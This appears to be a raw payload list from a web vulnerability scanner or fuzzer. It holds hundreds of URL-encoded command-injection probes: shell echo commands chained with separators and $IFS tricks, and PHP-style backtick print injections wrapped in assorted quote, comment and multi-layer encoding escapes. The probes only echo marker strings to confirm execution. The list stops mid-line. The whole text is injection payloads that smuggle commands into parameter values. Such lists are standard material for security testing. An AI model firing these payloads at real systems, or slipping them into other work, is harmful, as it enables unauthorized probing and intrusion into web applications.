ZPDRC%2F%2F\n||echo$IFSAOIEWW$((12%2B22))$(echo$IFSAOIEWW)AOIEWW%2F%2F\n&&echo$IFSTRGLMB$((67%2B67))$(echo$IFSTRGLMB)TRGLMB%2F%2F\n%0aecho$IFSTWDCWQ$((75%2B11))$(echo$IFSTWDCWQ)TWDCWQ%2F%2F\n%3Becho$IFSCAANPZ$((68%2B82))$(echo$IFSCAANPZ)CAANPZ%2F%2F\n%26echo$IFSVUHFEV$((97%2B15))$(echo$IFSVUHFEV)VUHFEV%2F%2F\n%26%26echo$IFSCFKMSQ$((61%2B81))$(echo$IFSCFKMSQ)CFKMSQ%2F%2F\n%7Cecho$IFSUSIKAS$((1%2B68))$(echo$IFSUSIKAS)USIKAS%2F%2F\n%7C%7Cecho$IFSXCDKHN$((36%2B59))$(echo$IFSXCDKHN)XCDKHN%2F%2F\necho$IFSVNBHRD$((3%2B40))$(echo$IFSVNBHRD)VNBHRD%26\n%20echo%20NJKFHE$((39%2B55))$(echo%20NJKFHE)NJKFHE%26\n;echo$IFSSFSQHL$((95%2B33))$(echo$IFSSFSQHL)SFSQHL%26\n&echo$IFSHBNWJW$((18%2B27))$(echo$IFSHBNWJW)HBNWJW%26\n|echo$IFSGOWBHJ$((93%2B50))$(echo$IFSGOWBHJ)GOWBHJ%26\n||echo$IFSWOSZUB$((94%2B79))$(echo$IFSWOSZUB)WOSZUB%26\n&&echo$IFSLXSNBD$((51%2B37))$(echo$IFSLXSNBD)LXSNBD%26\n%0aecho$IFSKKFGER$((40%2B66))$(echo$IFSKKFGER)KKFGER%26\n%3Becho$IFSMSQSJK$((23%2B24))$(echo$IFSMSQSJK)MSQSJK%26\n%26echo$IFSWJHRPR$((2%2B76))$(echo$IFSWJHRPR)WJHRPR%26\n%26%26echo$IFSJMVDAO$((52%2B94))$(echo$IFSJMVDAO)JMVDAO%26\n%7Cecho$IFSRKAPVH$((51%2B24))$(echo$IFSRKAPVH)RKAPVH%26\n%7C%7Cecho$IFSKGBLOE$((27%2B72))$(echo$IFSKGBLOE)KGBLOE%26\necho$IFSXZNCQP$((56%2B62))$(echo$IFSXZNCQP)XZNCQP%7C\n%20echo%20VYWJPM$((40%2B5))$(echo%20VYWJPM)VYWJPM%7C\n;echo$IFSXTEPMK$((70%2B42))$(echo$IFSXTEPMK)XTEPMK%7C\n&echo$IFSBVUDYH$((40%2B0))$(echo$IFSBVUDYH)BVUDYH%7C\n|echo$IFSGIHYII$((20%2B80))$(echo$IFSGIHYII)GIHYII%7C\n||echo$IFSUNKBIA$((84%2B96))$(echo$IFSUNKBIA)UNKBIA%7C\n&&echo$IFSQOTWYJ$((4%2B30))$(echo$IFSQOTWYJ)QOTWYJ%7C\n%0aecho$IFSTCNIRU$((23%2B88))$(echo$IFSTCNIRU)TCNIRU%7C\n%3Becho$IFSCFUQON$((7%2B1))$(echo$IFSCFUQON)CFUQON%7C\n%26echo$IFSCNSGBG$((72%2B11))$(echo$IFSCNSGBG)CNSGBG%7C\n%26%26echo$IFSYLKPEL$((22%2B81))$(echo$IFSYLKPEL)YLKPEL%7C\n%7Cecho$IFSLBCAYT$((13%2B58))$(echo$IFSLBCAYT)LBCAYT%7C\n%7C%7Cecho$IFSEXCORO$((79%2B26))$(echo$IFSEXCORO)EXCORO%7C\nprint(`echo%20BAYPKT`.`echo%20$((43%2B10))`.`echo%20BAYPKT`.`echo%20BAYPKT`)%3BBAYPKT\nprint(`echo%20DWYWNU;echo%20$((31%2B36));echo%20DWYWNU;echo%20DWYWNU`)%3BDWYWNU\nprint(`echo%20OKEJJB%0aecho%20$((46%2B60))%0aecho%20OKEJJB%0aecho%20OKEJJB`)%3BOKEJJB\nprint(`echo%20COMCFL\\necho%20$((84%2B79))\\necho%20COMCFL\\necho%20COMCFL`)%3BCOMCFL\nprint(`echo%20ADZJNM`.`echo%20$((71%2B71))`.`echo%20ADZJNM`.`echo%20ADZJNM`)%3B%5C%5CADZJNM\nprint(`echo%20DEGOPG;echo%20$((38%2B61));echo%20DEGOPG;echo%20DEGOPG`)%3B%255C%255CDEGOPG\nprint(`echo%20QGZDYY%0aecho%20$((26%2B56))%0aecho%20QGZDYY%0aecho%20QGZDYY`)%3B%25255C%25255CQGZDYY\nprint(`echo%20DAESAZ\\necho%20$((6%2B17))\\necho%20DAESAZ\\necho%20DAESAZ`)%3B%2525255C%2525255CDAESAZ\nprint(`echo%20OSGUGU`.`echo%20$((64%2B8))`.`echo%20OSGUGU`.`echo%20OSGUGU`)%3B//OSGUGU\nprint(`echo%20LPXWJK;echo%20$((35%2B1));echo%20LPXWJK;echo%20LPXWJK`)%3B//LPXWJK\nprint(`echo%20XEMHBO%0aecho%20$((11%2B24))%0aecho%20XEMHBO%0aecho%20XEMHBO`)%3B//XEMHBO\nprint(`echo%20ETZHWZ\\necho%20$((20%2B88))\\necho%20ETZHWZ\\necho%20ETZHWZ`)%3B//ETZHWZ\nprint(`echo%20GENLGI`.`echo%20$((14%2B11))`.`echo%20GENLGI`.`echo%20GENLGI`)%3B%23GENLGI\nprint(`echo%20DYZZIW;echo%20$((94%2B81));echo%20DYZZIW;echo%20DYZZIW`)%3B%2523DYZZIW\nprint(`echo%20UBBYNF%0aecho%20$((67%2B26))%0aecho%20UBBYNF%0aecho%20UBBYNF`)%3B%252523UBBYNF\nprint(`echo%20EIPAAC\\necho%20$((42%2B82))\\necho%20EIPAAC\\necho%20EIPAAC`)%3B%25252523EIPAAC\nprint(`echo%20WQMIIN`.`echo%20$((36%2B90))`.`echo%20WQMIIN`.`echo%20WQMIIN`)%3B.%22WQMIIN\nprint(`echo%20NSKJQW;echo%20$((41%2B11));echo%20NSKJQW;echo%20NSKJQW`)%3B.%2522NSKJQW\nprint(`echo%20DBCNNO%0aecho%20$((39%2B97))%0aecho%20DBCNNO%0aecho%20DBCNNO`)%3B.%252522DBCNNO\nprint(`echo%20GDOHGQ\\necho%20$((28%2B89))\\necho%20GDOHGQ\\necho%20GDOHGQ`)%3B.%25252522GDOHGQ\nprint(`echo%20RREYBJ`.`echo%20$((33%2B25))`.`echo%20RREYBJ`.`echo%20RREYBJ`)%3B.%27RREYBJ\nprint(`echo%20PFLDED;echo%20$((95%2B99));echo%20PFLDED;echo%20PFLDED`)%3B.%2527PFLDED\nprint(`echo%20TVCCND%0aecho%20$((62%2B6))%0aecho%20TVCCND%0aecho%20TVCCND`)%3B.%252527TVCCND\nprint(`echo%20HHRISK\\necho%20$((73%2B42))\\necho%20HHRISK\\necho%20HHRISK`)%3B.%25252527HHRISK\nprint(`echo%20WZLIFQ`.`echo%20$((3%2B42))`.`echo%20WZLIFQ`.`echo%20WZLIFQ`)%29%7DWZLIFQ\nprint(`echo%20ZHAWPM;echo%20$((18%2B57));echo%20ZHAWPM;echo%20ZHAWPM`)%3B%2529%257DZHAWPM\nprint(`echo%20XWPSAV%0aecho%20$((22%2B11))%0aecho%20XWPSAV%0aecho%20XWPSAV`)%3B%252529%25257DXWPSAV\nprint(`echo%20BQVIXY\\necho%20$((53%2B95))\\necho%20BQVIXY\\necho%20BQVIXY`)%3B%25252529%2525257DBQVIXY\n'print(`echo%20DUAYMM`.`echo%20$((77%2B73))`.`echo%20DUAYMM`.`echo%20DUAYMM`)%3BDUAYMM\n'print(`echo%20TUDOUK;echo%20$((63%2B88));echo%20TUDOUK;echo%20TUDOUK`)%3BTUDOUK\n'print(`echo%20AHOHOK%0aecho%20$((14%2B28))%0aecho%20AHOHOK%0aecho%20AHOHOK`)%3BAHOHOK\n'print(`echo%20BRTYSY\\necho%20$((74%2B40))\\necho%20BRTYSY\\necho%20BRTYSY`)%3BBRTYSY\n'print(`echo%20DQLEND`.`echo%20$((63%2B84))`.`echo%20DQLEND`.`echo%20DQLEND`)%3B%5C%5CDQLEND\n'print(`echo%20RAZRYE;echo%20$((84%2B60));echo%20RAZRYE;echo%20RAZRYE`)%3B%255C%255CRAZRYE\n'print(`echo%20MURMGO%0aecho%20$((13%2B87))%0aecho%20MURMGO%0aecho%20MURMGO`)%3B%25255C%25255CMURMGO\n'print(`echo%20WSILLK\\necho%20$((70%2B70))\\necho%20WSILLK\\necho%20WSILLK`)%3B%2525255C%2525255CWSILLK\n'print(`echo%20GGTKKU`.`echo%20$((23%2B93))`.`echo%20GGTKKU`.`echo%20GGTKKU`)%3B//GGTKKU\n'print(`echo%20CRERAD;echo%20$((48%2B33));echo%20CRERAD;echo%20CRERAD`)%3B//CRERAD\n'print(`echo%20STJAIG%0aecho%20$((89%2B81))%0aecho%20STJAIG%0aecho%20STJAIG`)%3B//STJAIG\n'print(`echo%20CVFEYY\\necho%20$((56%2B86))\\necho%20CVFEYY\\necho%20CVFEYY`)%3B//CVFEYY\n'print(`echo%20KKQSRA`.`echo%20$((71%2B76))`.`echo%20KKQSRA`.`echo%20KKQSRA`)%3B%23KKQSRA\n'print(`echo%20GSORDT;echo%20$((68%2B29));echo%20GSORDT;echo%20GSORDT`)%3B%2523GSORDT\n'print(`echo%20TPBMFF%0aecho%20$((79%2B13))%0aecho%20TPBMFF%0aecho%20TPBMFF`)%3B%252523TPBMFF\n'print(`echo%20WCPHMV\\necho%20$((3%2B88))\\necho%20WCPHMV\\necho%20WCPHMV`)%3B%25252523WCPHMV\n'print(`echo%20MKGGZP`.`echo%20$((69%2B92))`.`echo%20MKGGZP`.`echo%20MKGGZP`)%3B.%22MKGGZP\n'print(`echo%20UPGYTK;echo%20$((49%2B93));echo%20UPGYTK;echo%20UPGYTK`)%3B.%2522UPGYTK\n'print(`echo%20FQEMGW%0aecho%20$((58%2B2))%0aecho%20FQEMGW%0aecho%20FQEMGW`)%3B.%252522FQEMGW\n'print(`echo%20UDOCFL\\necho%20$((86%2B7))\\necho%20UDOCFL\\necho%20UDOCFL`)%3B.%25252522UDOCFL\n'print(`echo%20ANYJLP`.`echo%20$((86%2B96))`.`echo%20ANYJLP`.`echo%20ANYJLP`)%3B.%27ANYJLP\n'print(`echo%20ADRNCB;echo%20$((35%2B33));echo%20ADRNCB;echo%20ADRNCB`)%3B.%2527ADRNCB\n'print(`echo%20AYKYLG%0aecho%20$((60%2B1))%0aecho%20AYKYLG%0aecho%20AYKYLG`)%3B.%252527AYKYLG\n'print(`echo%20JIKWPW\\necho%20$((92%2B0))\\necho%20JIKWPW\\necho%20JIKWPW`)%3B.%25252527JIKWPW\n'print(`echo%20MLMZKH`.`echo%20$((30%2B25))`.`echo%20MLMZKH`.`echo%20MLMZKH`)%29%7DMLMZKH\n'print(`echo%20RRMVOG;echo%20$((30%2B37));echo%20RRMVOG;echo%20RRMVOG`)%3B%2529%257DRRMVOG\n'print(`echo%20BFUQZN%0aecho%20$((42%2B76))%0aecho%20BFUQZN%0aecho%20BFUQZN`)%3B%252529%25257DBFUQZN\n'print(`echo%20AWHBQS\\necho%20$((81%2B11))\\necho%20AWHBQS\\necho%20AWHBQS`)%3B%25252529%2525257DAWHBQS\n)print(`echo%20VWOEOC`.`echo%20$((97%2B4))`.`echo%20VWOEOC`.`echo%20VWOEOC`)%3BVWOEOC\n)print(`echo%20VIVSXO;echo%20$((60%2B28));echo%20VIVSXO;echo%20VIVSXO`)%3BVIVSXO\n)print(`echo%20HQNHAD%0aecho%20$((91%2B64))%0aecho%20HQNHAD%0aecho%20HQNHAD`)%3BHQNHAD\n)print(`echo%20MADCWE\\necho%20$((88%2B74))\\necho%20MADCWE\\necho%20MADCWE`)%3BMADCWE\n)print(`echo%20QQGYPS`.`echo%20$((10%2B39))`.`echo%20QQGYPS`.`echo%20QQGYPS`)%3B%5C%5CQQGYPS\n)print(`echo%20DLBCJS;echo%20$((58%2B85));echo%20DLBCJS;echo%20DLBCJS`)%3B%255C%255CDLBCJS\n)print(`echo%20UDBRRF%0aecho%20$((39%2B57))%0aecho%20UDBRRF%0aecho%20UDBRRF`)%3B%25255C%25255CUDBRRF\n)print(`echo%20NLOFKT\\necho%20$((26%2B86))\\necho%20NLOFKT\\necho%20NLOFKT`)%3B%2525255C%2525255CNLOFKT\n)print(`echo%20PUEXZN`.`echo%20$((11%2B4))`.`echo%20PUEXZN`.`echo%20PUEXZN`)%3B//PUEXZN\n)print(`echo%20IFOQRT;echo%20$((35%2B23));echo%20IFOQRT;echo%20IFOQRT`)%3B//IFOQRT\n)print(`echo%20SYVAYV%0aecho%20$((36%2B49))%0aecho%20SYVAYV%0aecho%20SYVAYV`)%3B//SYVAYV\n)print(`echo%20KPLWCF\\necho%20$((96%2B6))\\necho%20KPLWCF\\necho%20KPLWCF`)%3B//KPLWCF\n)print(`echo%20EHMRQP`.`echo%20$((92%2B22))`.`echo%20EHMRQP`.`echo%20EHMRQP`)%3B%23EHMRQP\n)print(`echo%20ECXTUU;echo%20$((10%2B67));echo%20ECXTUU;echo%20ECXTUU`)%3B%2523ECXTUU\n)print(`echo%20LXAMNA%0aecho%20$((68%2B25))%0aecho%20LXAMNA%0aecho%20LXAMNA`)%3B%252523LXAMNA\n)print(`echo%20ASMFMR\\necho%20$((34%2B56))\\necho%20ASMFMR\\necho%20ASMFMR`)%3B%25252523ASMFMR\n)print(`echo%20HXXRRP`.`echo%20$((98%2B1))`.`echo%20HXXRRP`.`echo%20HXXRRP`)%3B.%22HXXRRP\n)print(`echo%20SQLMHW;echo%20$((75%2B6));echo%20SQLMHW;echo%20SQLMHW`)%3B.%2522SQLMHW\n)print(`echo%20DPBGWU%0aecho%20$((48%2B67))%0aecho%20DPBGWU%0aecho%20DPBGWU`)%3B.%252522DPBGWU\n)print(`echo%20YKQUFP\\necho%20$((94%2B91))\\necho%20YKQUFP\\necho%20YKQUFP`)%3B.%25252522YKQUFP\n)print(`echo%20NNYPSL`.`echo%20$((56%2B33))`.`echo%20NNYPSL`.`echo%20NNYPSL`)%3B.%27NNYPSL\n)print(`echo%20YIXKKR;echo%20$((83%2B25));echo%20YIXKKR;echo%20YIXKKR`)%3B.%2527YIXKKR\n)print(`echo%20FGPZFR%0aecho%20$((7%2B1))%0aecho%20FGPZFR%0aecho%20FGPZFR`)%3B.%252527FGPZFR\n)print(`echo%20EZVLWV\\necho%20$((40%2B27))\\necho%20EZVLWV\\necho%20EZVLWV`)%3B.%25252527EZVLWV\n)print(`echo%20GGCMZV`.`echo%20$((6%2B53))`.`echo%20GGCMZV`.`echo%20GGCMZV`)%29%7DGGCMZV\n)print(`echo%20QADPCR;echo%20$((51%2B16));echo%20QADPCR;echo%20QADPCR`)%3B%2529%257DQADPCR\n)print(`echo%20AFOMNK%0aecho%20$((45%2B23))%0aecho%20AFOMNK%0aecho%20AFOMNK`)%3B%252529%25257DAFOMNK\n)print(`echo%20EVRVDK\\necho%20$((98%2B18))\\necho%20EVRVDK\\necho%20EVRVDK`)%3B%25252529%2525257DEVRVDK\n')print(`echo%20KYHRZA`.`echo%20$((72%2B0))`.`echo%20KYHRZA`.`echo%20KYHRZA`)%3BKYHRZA\n')print(`echo%20ESWACN;echo%20$((37%2B82));echo%20ESWACN;echo%20ESWACN`)%3BESWACN\n')print(`echo%20BWPFXW%0aecho%20$((76%2B34))%0aecho%20BWPFXW%0aecho%20BWPFXW`)%3BBWPFXW\n')print(`echo%20EXVUXJ\\necho%20$((73%2B54))\\necho%20EXVUXJ\\necho%20EXVUXJ`)%3BEXVUXJ\n')print(`echo%20SATCYU`.`echo%20$((51%2B26))`.`echo%20SATCYU`.`echo%20SATCYU`)%3B%5C%5CSATCYU\n')print(`echo%20BONGAS;echo%20$((69%2B7));echo%20BONGAS;echo%20BONGAS`)%3B%255C%255CBONGAS\n')print(`echo%20VPYMWX%0aecho%20$((10%2B22))%0aecho%20VPYMWX%0aecho%20VPYMWX`)%3B%25255C%25255CVPYMWX\n')print(`echo%20OXDDYE\\necho%20$((75%2B92))\\necho%20OXDDYE\\necho%20OXDDYE`)%3B%2525255C%2525255COXDDYE\n')print(`echo%20NFASEM`.`echo%20$((28%2B31))`.`echo%20NFASEM`.`echo%20NFASEM`)%3B//NFASEM\n')print(`echo%20FCMKMZ;echo%20$((68%2B75));echo%20FCMKMZ;echo%20FCMKMZ`)%3B//FCMKMZ\n')print(`echo%20DWTUTD%0aecho%20$((10%2B15))%0aecho%20DWTUTD%0aecho%20DWTUTD`)%3B//DWTUTD\n')print(`echo%20EHPKWP\\necho%20$((79%2B86))\\necho%20EHPKWP\\necho%20EHPKWP`)%3B//EHPKWP\n')print(`echo%20PWUTCR`.`echo%20$((0%2B3))`.`echo%20PWUTCR`.`echo%20PWUTCR`)%3B%23PWUTCR\n')print(`echo%20OFKEZB;echo%20$((35%2B78));echo%20OFKEZB;echo%20OFKEZB`)%3B%2523OFKEZB\n')print(`echo%20WUCPEY%0aecho%20$((63%2B16))%0aecho%20WUCPEY%0aecho%20WUCPEY`)%3B%252523WUCPEY\n')print(`echo%20MAOJQM\\necho%20$((57%2B39))\\necho%20MAOJQM\\necho%20MAOJQM`)%3B%25252523MAOJQM\n')print(`echo%20VRYZVO`.`echo%20$((19%2B54))`.`echo%20VRYZVO`.`echo%20VRYZVO`)%3B.%22VRYZVO\n')print(`echo%20EVXXCT;echo%20$((87%2B15));echo%20EVXXCT;echo%20EVXXCT`)%3B.%2522EVXXCT\n')print(`echo%20JUEAPR%0aecho%20$((30%2B6))%0aecho%20JUEAPR%0aecho%20JUEAPR`)%3B.%252522JUEAPR\n')print(`echo%20XQTSKO\\necho%20$((61%2B71))\\necho%20XQTSKO\\necho%20XQTSKO`)%3B.%25252522XQTSKO\n')print(`echo%20TYAJKR`.`echo%20$((73%2B69))`.`echo%20TYAJKR`.`echo%20TYAJKR`)%3B.%27TYAJKR\n')print(`echo%20EHVUCK;echo%20$((3%2B47));echo%20EHVUCK;echo%20EHVUCK`)%3B.%2527EHVUCK\n')print(`echo%20PMUZEH%0aecho%20$((73%2B89))%0aecho%20PMUZEH%0aecho%20PMUZEH`)%3B.%252527PMUZEH\n')print(`echo%20QTJEKD\\necho%20$((90%2B98))\\necho%20QTJEKD\\necho%20QTJEKD`)%3B.%25252527QTJEKD\n')print(`echo%20RUXOHA`.`echo%20$((74%2B92))`.`echo%20RUXOHA`.`echo%20RUXOHA`)%29%7DRUXOHA\n')print(`echo%20VEMMAU;echo%20$((59%2B39));echo%20VEMMAU;echo%20VEMMAU`)%3B%2529%257DVEMMAU\n')print(`echo%20AGBHMS%0aecho%20$((79%2B32))%0aecho%20AGBHMS%0aecho%20AGBHMS`)%3B%252529%25257DAGBHMS\n')print(`echo%20VHLBFA\\necho%20$((78%2B60))\\necho%20VHLBFA\\necho%20VHLBFA`)%3B%25252529%2525257DVHLBFA\n\")print(`echo%20COMPTT`.`echo%20$((78%2B29))`.`echo%20COMPTT`.`echo%20COMPTT`)%3BCOMPTT\n\")print(`echo%20OTTCBX;echo%20$((64%2B75));echo%20OTTCBX;echo%20OTTCBX`)%3BOTTCBX\n\")print(`echo%20PPZHBZ%0aecho%20$((86%2B40))%0aecho%20PPZHBZ%0aecho%20PPZHBZ`)%3BPPZHBZ\n\")print(`echo%20PHKGWS\\necho%20$((9%2B71))\\necho%20PHKGWS\\necho%20PHKGWS`)%3BPHKGWS\n\")print(`echo%20MOHYBU`.`echo%20$((61%2B5))`.`echo%20MOHYBU`.`echo%20MOHYBU`)%3B%5C%5CMOHYBU\n\")print(`echo%20ATRPAE;echo%20$((77%2B72));echo%20ATRPAE;echo%20ATRPAE`)%3B%255C%255CATRPAE\n\")print(`echo%20GHHJFR%0aecho%20$((52%2B63))%0aecho%20GHHJFR%0aecho%20GHHJFR`)%3B%25255C%25255CGHHJFR\n\")print(`echo%20NBPPTV\\necho%20$((1%2B63))\\necho%20NBPPTV\\necho%20NBPPTV`)%3B%2525255C%2525255CNBPPTV\n\")print(`echo%20OZMQFI`.`echo%20$((35%2B9))`.`echo%20OZMQFI`.`echo%20OZMQFI`)%3B//OZMQFI\n\")print(`echo%20HXHMHH;echo%20$((40%2B31));echo%20HXHMHH;echo%20HXHMHH`)%3B//HXHMHH\n\")print(`echo%20OVQSQG%0aecho%20$((8%2B36))%0aecho%20OVQSQG%0aecho%20OVQSQG`)%3B//OVQSQG\n\")print(`echo%20ULOIOS\\necho%20$((51%2B30))\\necho%20ULOIOS\\necho%20ULOIOS`)%3B//ULOIOS\n\")print(`echo%20CHKGSS`.`echo%20$((80%2B0))`.`echo%20CHKGSS`.`echo%20CHKGSS`)%3B%23CHKGSS\n\")print(`echo%20KZZFJE;echo%20$((74%2B13));echo%20KZZFJE;echo%20KZZFJE`)%3B%2523KZZFJE\n\")print(`echo%20RPOOHR%0aecho%20$((72%2B27))%0aecho%20RPOOHR%0aecho%20RPOOHR`)%3B%252523RPOOHR\n\")print(`echo%20UKYEKY\\necho%20$((70%2B74))\\necho%20UKYEKY\\necho%20UKYEKY`)%3B%25252523UKYEKY\n\")print(`echo%20SGRKCG`.`echo%20$((91%2B4))`.`echo%20SGRKCG`.`echo%20SGRKCG`)%3B.%22SGRKCG\n\")print(`echo%20SPKTID;echo%20$((50%2B54));echo%20SPKTID;echo%20SPKTID`)%3B.%2522SPKTID\n\")print(`echo%20XCIHWH%0aecho%20$((57%2B90))%0aecho%20XCIHWH%0aecho%20XCIHWH`)%3B.%252522XCIHWH\n\")print(`echo%20JNKGOO\\necho%20$((17%2B90))\\necho%20JNKGOO\\necho%20JNKGOO`)%3B.%25252522JNKGOO\n\")print(`echo%20QZFGHE`.`echo%20$((4%2B60))`.`echo%20QZFGHE`.`echo%20QZFGHE`)%3B.%27QZFGHE\n\")print(`echo%20CAQHUJ;echo%20$((70%2B24));echo%20CAQHUJ;echo%20CAQHUJ`)%3B.%2527CAQHUJ\n\")print(`echo%20ADFEOJ%0aecho%20$((67%2B57))%0aecho%20ADFEOJ%0aecho%20ADFEOJ`)%3B.%252527ADFEOJ\n\")print(`echo%20GIKPYM\\necho%20$((77%2B22))\\necho%20GIKPYM\\necho%20GIKPYM`)%3B.%25252527GIKPYM\n\")print(`echo%20SPTGKB`.`echo%20$((57%2B66))`.`echo%20SPTGKB`.`echo%20SPTGKB`)%29%7DSPTGKB\n\")print(`echo%20COYGWQ;echo%20$((40%2B21));echo%20COYGWQ;echo%20COYGWQ`)%3B%2529%257DCOYGWQ\n\")print(`echo%20MMOCRN%0aecho%20$((88%2B99))%0aecho%20MMOCRN%0aecho%20MMOCRN`)%3B%252529%25257DMMOCRN\n\")print(`echo%20BUJJSS\\necho%20$((4%2B1))\\necho%20BUJJSS\\necho%20BUJJSS`)%3B%25252529%2525257DBUJJSS\n\".print(`echo%20COYIQB`.`echo%20$((70%2B26))`.`echo%20COYIQB`.`echo%20COYIQB`)%3BCOYIQB\n\".print(`echo%20UCUISA;echo%20$((65%2B31));echo%20UCUISA;echo%20UCUISA`)%3BUCUISA\n\".print(`echo%20AGODDO%0aecho%20$((7%2B33))%0aecho%20AGODDO%0aecho%20AGODDO`)%3BAGODDO\n\".print(`echo%20IFQMUW\\necho%20$((62%2B32))\\necho%20IFQMUW\\necho%20IFQMUW`)%3BIFQMUW\n\".print(`echo%20RZWFMA`.`echo%20$((75%2B86))`.`echo%20RZWFMA`.`echo%20RZWFMA`)%3B%5C%5CRZWFMA\n\".print(`echo%20RVELEJ;echo%20$((74%2B30));echo%20RVELEJ;echo%20RVELEJ`)%3B%255C%255CRVELEJ\n\".print(`echo%20ACGJLG%0aecho%20$((54%2B11))%0aecho%20ACGJLG%0aecho%20ACGJLG`)%3B%25255C%25255CACGJLG\n\".print(`echo%20PZAGMU\\necho%20$((23%2B82))\\necho%20PZAGMU\\necho%20PZAGMU`)%3B%2525255C%2525255CPZAGMU\n\".print(`echo%20XBJBDE`.`echo%20$((48%2B93))`.`echo%20XBJBDE`.`echo%20XBJBDE`)%3B//XBJBDE\n\".print(`echo%20EYOYIJ;echo%20$((34%2B58));echo%20EYOYIJ;echo%20EYOYIJ`)%3B//EYOYIJ\n\".print(`echo%20WKFYWT%0aecho%20$((57%2B28))%0aecho%20WKFYWT%0aecho%20WKFYWT`)%3B//WKFYWT\n\".print(`echo%20MKBEZC\\necho%20$((61%2B47))\\necho%20MKBEZC\\necho%20MKBEZC`)%3B//MKBEZC\n\".print(`echo%20POVQEX`.`echo%20$((96%2B65))`.`echo%20POVQEX`.`echo%20POVQEX`)%3B%23POVQEX\n\".print(`echo%20MFYSPW;echo%20$((87%2B75));echo%20MFYSPW;echo%20MFYSPW`)%3B%2523MFYSPW\n\".print(`echo%20DSHOEV%0aecho%20$((44%2B47))%0aecho%20DSHOEV%0aecho%20DSHOEV`)%3B%252523DSHOEV\n\".print(`echo%20ULLCKQ\\necho%20$((63%2B14))\\necho%20ULLCKQ\\necho%20ULLCKQ`)%3B%25252523ULLCKQ\n\".print(`echo%20DFRGXJ`.`echo%20$((12%2B99))`.`echo%20DFRGXJ`.`echo%20DFRGXJ`)%3B.%22DFRGXJ\n\".print(`echo%20EKDSZM;echo%20$((50%2B62));echo%20EKDSZM;echo%20EKDSZM`)%3B.%2522EKDSZM\n\".print(`echo%20ZTFYUM%0aecho%20$((56%2B81))%0aecho%20ZTFYUM%0aecho%20ZTFYUM`)%3B.%252522ZTFYUM\n\".print(`echo%20CEZYFB\\necho%20$((70%2B98))\\necho%20CEZYFB\\necho%20CEZYFB`)%3B.%25252522CEZYFB\n\".print(`echo%20HAMONB`.`echo%20$((26%2B57))`.`echo%20HAMONB`.`echo%20HAMONB`)%3B.%27HAMONB\n\".print(`echo%20VFIBZQ;echo%20$((31%2B85));echo%20VFIBZQ;echo%20VFIBZQ`)%3B.%2527VFIBZQ\n\".print(`echo%20XKLFAP%0aecho%20$((76%2B43))%0aecho%20XKLFAP%0aecho%20XKLFAP`)%3B.%252527XKLFAP\n\".print(`echo%20DBTAFQ\\necho%20$((79%2B27))\\necho%20DBTAFQ\\necho%20DBTAFQ`)%3B.%25252527DBTAFQ\n\".print(`echo%20ZLVKDU`.`echo%20$((0%2B22))`.`echo%20ZLVKDU`.`echo%20ZLVKDU`)%29%7DZLVKDU\n\".print(`echo%20HGIQEK;echo%20$((64%2B67));echo%20HGIQEK;echo%20HGIQEK`)%3B%2529%257DHGIQEK\n\".print(`echo%20UFRBLO%0aecho%20$((1%2B17))%0aecho%20UFRBLO%0aecho%20UFRBLO`)%3B%252529%25257DUFRBLO\n\".print(`echo%20MGGIBH\\necho%20$((69%2B4))\\necho%20MGGIBH\\necho%20MGGIBH`)%3B%25252529%2525257DMGGIBH\n'.print(`echo%20IQVVVA`.`echo%20$((38%2B34))`.`echo%20IQVVVA`.`echo%20IQVVVA`)%3BIQVVVA\n'.print(`echo%20KHHFWC;echo%20$((15%2B27));echo%20KHHFWC;echo%20KHHFWC`)%3BKHHFWC\n'.print(`echo%20NXDUHQ%0aecho%20$((28%2B78))%0aecho%20NXDUHQ%0aecho%20NXDUHQ`)%3BNXDUHQ\n'.print(`echo%20XYCPFN\\necho%20$((60%2B62))\\necho%20XYCPFN\\necho%20XYCPFN`)%3BXYCPFN\n'.print(`echo%20KKDSRH`.`echo%20$((88%2B16))`.`echo%20KKDSRH`.`echo%20KKDSRH`)%3B%5C%5CKKDSRH\n'.print(`echo%20QLKXYP;echo%20$((79%2B46));echo%20QLKXYP;echo%20QLKXYP`)%3B%255C%255CQLKXYP\n'.print(`echo%20EVZCEK%0aecho%20$((38%2B37))%0aecho%20EVZCEK%0aecho%20EVZCEK`)%3B%25255C%25255CEVZCEK\n'.print(`echo%20VXYNWW\\necho%20$((29%2B16))\\necho%20VXYNWW\\necho%20VXYNWW`)%3B%2525255C%2525255CVXYNWW\n'.print(`echo%20KVAVOQ`.`echo%20$((63%2B81))`.`echo%20KVAVOQ`.`echo%20KVAVOQ`)%3B//KVAVOQ\n'.print(`echo%20GDFQZF;echo%20$((65%2B2));echo%20GDFQZF;echo%20GDFQZF`)%3B//GDFQZF\n'.print(`echo%20SMJBZB%0aecho%20$((19%2B71))%0aecho%20SMJBZB%0aecho%20SMJBZB`)%3B//SMJBZB\n'.print(`echo%20CXYKAU\\necho%20$((56%2B15))\\necho%20CXYKAU\\necho%20CXYKAU`)%3B//CXYKAU\n'.print(`echo%20VWGDMS`.`echo%20$((77%2B11))`.`echo%20VWGDMS`.`echo%20VWGDMS`)%3B%23VWGDMS\n'.print(`echo%20DWVXEQ;echo%20$((13%2B19));echo%20DWVXEQ;echo%20DWVXEQ`)%3B%2523DWVXEQ\n'.print(`echo%20YBQGFX%0aecho%20$((90%2B18))%0aecho%20YBQGFX%0aecho%20YBQGFX`)%3B%252523YBQGFX\n'.print(`echo%20IYCMIH\\necho%20$((35%2B93))\\necho%20IYCMIH\\necho%20IYCMIH`)%3B%25252523IYCMIH\n'.print(`echo%20ULZFRM`.`echo%20$((96%2B62))`.`echo%20ULZFRM`.`echo%20ULZFRM`)%3B.%22ULZFRM\n'.print(`echo%20MFFGYS;echo%20$((68%2B25));echo%20MFFGYS;echo%20MFFGYS`)%3B.%2522MFFGYS\n'.print(`echo%20HBLPLA%0aecho%20$((39%2B88))%0aecho%20HBLPLA%0aecho%20HBLPLA`)%3B.%252522HBLPLA\n'.print(`echo%20JLXMKL\\necho%20$((67%2B26))\\necho%20JLXMKL\\necho%20JLXMKL`)%3B.%25252522JLXMKL\n'.print(`echo%20RDHTSN`.`echo%20$((90%2B44))`.`echo%20RDHTSN`.`echo%20RDHTSN`)%3B.%27RDHTSN\n'.print(`echo%20WMQCVY;echo%20$((96%2B95));echo%20WMQCVY;echo%20WMQCVY`)%3B.%2527WMQCVY\n'.print(`echo%20MFBKHT%0aecho%20$((27%2B47))%0aecho%20MFBKHT%0aecho%20MFBKHT`)%3B.%252527MFBKHT\n'.print(`echo%20IINFPE\\necho%20$((95%2B84))\\necho%20IINFPE\\necho%20IINFPE`)%3B.%25252527IINFPE\n'.print(`echo%20HLTCM